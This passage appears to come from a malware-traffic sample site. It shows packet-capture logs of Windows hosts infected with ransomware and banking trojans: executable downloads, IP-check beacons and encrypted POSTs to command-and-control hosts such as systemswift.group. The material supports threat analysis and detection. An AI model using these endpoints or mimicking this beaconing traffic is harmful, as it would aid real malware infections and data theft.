Referer: http://189.129.4.186/rtm/symbols/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 189.129.4.186
Content-Length: 518
Connection: Keep-Alive
Cache-Control: no-cache

6ll8i995327yEb1qC=SbbKQbNltyr7OEcfzxrUQ304Q2%2FW6l5R9lo%2B5pVxib%2FIt4w3Sjeay5KbFubuIws4O0t7iA%2FTTdyiyRHbY7ySX3cga1z4cQuduITiXM9R5e7rTet9Uod5fFGxgh4JKFGS5n1sQ2TqoRhHBRx7cyBqBFIuag5dqUNeimMgsfRfYiwz39hBgErZ2D0Phl7Y6pFo%2BgASm3UxQKPwVMO8ux4AN2qvVtS2pEQ1HZZcDFci1m1YUNPlvgGhz6Gdpiiz2nZ%2Fr4fpHEK8spNliNSciLGdp7XKmD3rkLzPW5Y2Gm6J0PHywumZH0hJryQUQdwGmeWY8LiNcnQW4bRzxcA%2FSgIA0B8peygnfyCIwigVnD%2FwUBRRFjTCh5crDpm86cA9sZx1tnMgWbVF3cyJLDXvAkyYI%2B9IReYi9WIMTYjpUuPBxEm5zYaLYolpypw07kquVeRU5xXpSD3wp4D7w%2BmBFphGa1%2FKfn4%3D
2019-09-18 13:33:30.713609 IP 10.9.18.101.49166 > 104.236.185.25.8080: Flags [P.], seq 1031397366:1031397638, ack 3231780717, win 64240, length 272: HTTP: GET /whoami.php HTTP/1.1
E..8..@….K
.eh…….=y…..mP…….GET /whoami.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 104.236.185.25:8080
Cache-Control: no-cache

2019-09-18 13:33:30.722484 IP 10.9.18.101.49167 > 104.236.185.25.8080: Flags [P.], seq 2799073531:2799073803, ack 2887398240, win 64240, length 272: HTTP: GET /whoami.php HTTP/1.1
E..8..@….I
.eh………x…3`P…….GET /whoami.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 104.236.185.25:8080
Cache-Control: no-cache

2019-09-18 13:33:31.019952 IP 66.228.32.31.443 > 10.9.18.101.49165: Flags [P.], seq 1:211, ack 269, win 64240, length 210
E…]…..].B. .
.e……….h(P….P..HTTP/1.1 200 OK
Server: nginx
Date: Wed, 18 Sep 2019 17:33:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding

e
173.66.146.112
0

2019-09-18 13:33:31.096777 IP 189.129.4.186.80 > 10.9.18.101.49164: Flags [P.], seq 2600252:2600556, ack 1832, win 64240, length 304: HTTP: HTTP/1.1 200 OK
E..X]……p….
.e.P….^.r.!.P…….HTTP/1.1 200 OK
Server: nginx
Date: Wed, 18 Sep 2019 17:33:30 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 148
Connection: keep-alive

2019-09-18 13:33:35.224641 IP 10.9.18.101.49184 > 66.228.32.31.443: Flags [P.], seq 497095651:497096370, ack 1689891519, win 64240, length 719
E…..@…k.
.eB. .. ……d…P….x..POST /arizona/forced/sess/merge/ HTTP/1.1
Referer: http://66.228.32.31/arizona/forced/sess/merge/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 66.228.32.31:443
Content-Length: 274
Connection: Keep-Alive
Cache-Control: no-cache

Gr2qPfZCOq0zLdd=i7eSuPXcauG6h3x4nXsddr2HLhaseSX3P3dp7S4gBcKhcmoqkbf7HcBzb%2Brohq%2FeEkR%2BTnIjMI8V8T%2BAxqF%2FTEK2DhDrGASZbhUbLTPbf1upgbttXYNLrhthHlz4c5qcEHunBZWx0TLZ6Jd6XQvpghjIetcPXLPTuULc9957VIe9PeppR6pU9rDnk2VG%2Fw1PflceQ%2Fw59Gx%2BnGblT3orLZBUGOgmdwfAYGBjYe%2BuZLDzlb1T

smk.exe systemswift.group Ransomware Malware Trojan Download PCAP file Download Traffic Sample

2019-05-30 00:27:40.790210 IP 10.1.10.162.49184 > 10.1.10.224.80: Flags [P.], seq 3141076432:3141076852, ack 132281672, win 16425, length 420: HTTP: GET /smk.exe HTTP/1.1
E…..@…..
.
.
.
.. .P.9….uHP.@)D…GET /smk.exe HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 10.1.10.224
Connection: Keep-Alive

2019-05-30 00:27:41.270451 IP 10.1.10.224.80 > 10.1.10.162.49184: Flags [P.], seq 91981:92976, ack 420, win 237, length 995: HTTP
E…..@.@.DX
.
.
.
..P. …..9.tP…+……………………………………………………………………………………………………………………………………………………………………………………………….
……………………………………………………………………………………………………………………………………………………………………………………………………………….
………………………………………………………………………………………………………………P.,…….00………… ………………..h……….. .. …. …. …….00…. ..%………….
…..L.-. .-………….Y.-.(.-………….f.-.<.-………….r.-.D.-…………………~.-…….-…-…-…-…….-…….-…..ADVAPI32.dll.KERNEL32.DLL.MSIMG32.dll.USER32.dll….RegEnumKeyA…ExitProcess…GetProcAddress..LoadLibraryA..VirtualProtect..AlphaBlend..CreateIcon…………………………..
2019-05-30 00:27:41.471058 IP 10.1.10.224.80 > 10.1.10.162.49184: Flags [P.], seq 91981:92976, ack 420, win 237, length 995: HTTP
E…..@.@.DW
.
2019-05-30 00:28:45.641573 IP 10.1.10.162.49185 > 10.1.10.224.80: Flags [P.], seq 1442212575:1442212995, ack 1861255134, win 16425, length 420: HTTP: GET /upd.exe HTTP/1.1
E…..@…..
.
.
.
..!.PU.j.n…P.@)….GET /upd.exe HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 10.1.10.224
Connection: Keep-Alive

2019-05-30 00:31:43.342932 IP 10.1.10.162.49188 > 87.251.88.11.80: Flags [P.], seq 3366683940:3366684106, ack 1501580209, win 16425, length 166: HTTP: POST /index.php HTTP/1.1
E….1@…-P
.
.W.X..$.P…$Y.K.P.@)….POST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: systemswift.group
Content-Length: 43647
Cache-Control: no-cache

2019-05-30 00:31:43.903892 IP 10.1.10.162.49188 > 87.251.88.11.80: Flags [P.], seq 42506:43813, ack 1, win 16425, length 1307: HTTP
E..C.V@…(.
.
.W.X..$.P..+.Y.K.P.@)H…|.[0.m}.*u.S..#u.#u.#u.#..6a.#u.#g.6f.K/. ..Vu.l .wo.2X.D0.Q..9u.3a...j1.lu.m3...w4.g4.gu.D..D’.s=.&.B1.s!.qX.Q..G..@=.j;.gu.GX.Q..#..:.f’.N<.q:.#..j#.qX.Q..#..e9.!.qu.j&.o4.#..j#.qX.._. X.X..p!.nu.q:.f&.^X. ..p!.nX. \.n&.-0.fX.&.p&.f-...j;.m<.-0.fX. &.q#.0.-0.fX. \.u6.l&.-0.fX. \.g9.k:.w{.{0. \. 1.o=.p!.f-.._. &.=.p!.f-... &.=.p!.f-.._. &.=.p!.f-... .t8.f-... &.=.p!.f-.._. &.=.p!.f-... &.=.p!.f-.._. &.l:.p#.f-.._. &.=.p!.f-... &.=.p!.f-.._. &.=.p!.f-... &.=.p!.f-.._. ..b'.k..g0.f'.f-.._. \.f4.=.q:.l6.o..p!.f-... .f4.¨C11C&.p&.f-..¨C19C.G#.U..H’.B..n8.Ke.-0.fX.v%.Xd.-0.fu..¨C20C. ..q:.w9.+m.5{.-g.2m.._.HT..U..U..U..U..(…..U#.U.+U..U..U..u..U..U.A’.t&.q&.@:.h<.p .m!.q;.w..s9.q0.O:.-!.w…W..[..U..U..U.R…U…..U..U..U..T.#U…..U.l:.j0.j&.-!.w…W..[..U..U..U.&..l…:?.U..U..U..T.#U…..U.¨C12C.1c.1..4m.Bf.5d.7..3x.A…f.1b.5a.Gf.Ax.7…a.Gb.;¨C13C.E`.:..1..6f.4b.Ex.1m..a.7d.Bc.2x.2g.5g.3b.6..3c..a.7e.A..1x.Bg.Ec.2..1..6a.Ex.7…m.Ef.Gl.3..2l.2g.
2019-05-30 00:31:44.415010 IP 87.251.88.11.80 > 10.1.10.162.49188: Flags [P.], seq 1:192, ack 43813, win 32, length 191: HTTP: HTTP/1.1 200 OK
E …:@./…W.X.
.
..P.$Y.K…0IP.. .o..HTTP/1.1 200 OK
Server: nginx
Date: Thu, 30 May 2019 04:31:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.6.40

GET /sim.o t-trade.net Financial Stock Banking Malware Trojan PCAP file download sample

2019-05-29 21:16:12.610658 IP 10.1.10.162.60446 > 185.219.42.154.80: Flags [P.], seq 649603156:649603684, ack 3701990316, win 16425, length 528: HTTP: GET /sim.o HTTP/1.1
E..8w.@…..
.
…*….P&.(T….P.@)….GET /sim.o HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Range: bytes=240615-
Unless-Modified-Since: Wed, 29 May 2019 23:56:47 GMT
If-Range: "10d200-58a0f88c11a17"
Host: t-trade.net
Connection: Keep-Alive

2019-05-29 21:16:36.990639 IP 10.1.10.162.60447 > 77.222.57.253.80: Flags [P.], seq 1839010927:1839011208, ack 1315819563, win 16425, length 281: HTTP: POST /index.php HTTP/1.1
E..Ax.@….m
.
.M.9….Pm..oNm.+P.@)/…POST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: n500stoker.temp.swtest.ru
Content-Length: 109
Cache-Control: no-cache

J/.4/.=I.>:.>;.L/.I/.5/.>/.9/.>K.>8.N/.I/.;/./.?L.>>.><.>?.?N.(9.N/.8/.5/.4L.>3.?N.>>.>=.>2.(9.(9.(9.K/.>
2019-05-29 21:16:37.647544 IP 77.222.57.253.80 > 10.1.10.162.60447: Flags [P.], seq 42341:43801, ack 281, win 237, length 1460: HTTP
E …0@./..NM.9.

2019-05-29 21:16:45.383337 IP 10.1.10.162.60448 > 77.222.57.253.80: Flags [P.], seq 4169006147:4169006321, ack 1258956205, win 16425, length 174: HTTP: POST /index.php HTTP/1.1
E…~.@…..
.
.M.9.. .P.}.CK
%.P.@)L…POST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: n500stoker.temp.swtest.ru
Content-Length: 43590
Cache-Control: no-cache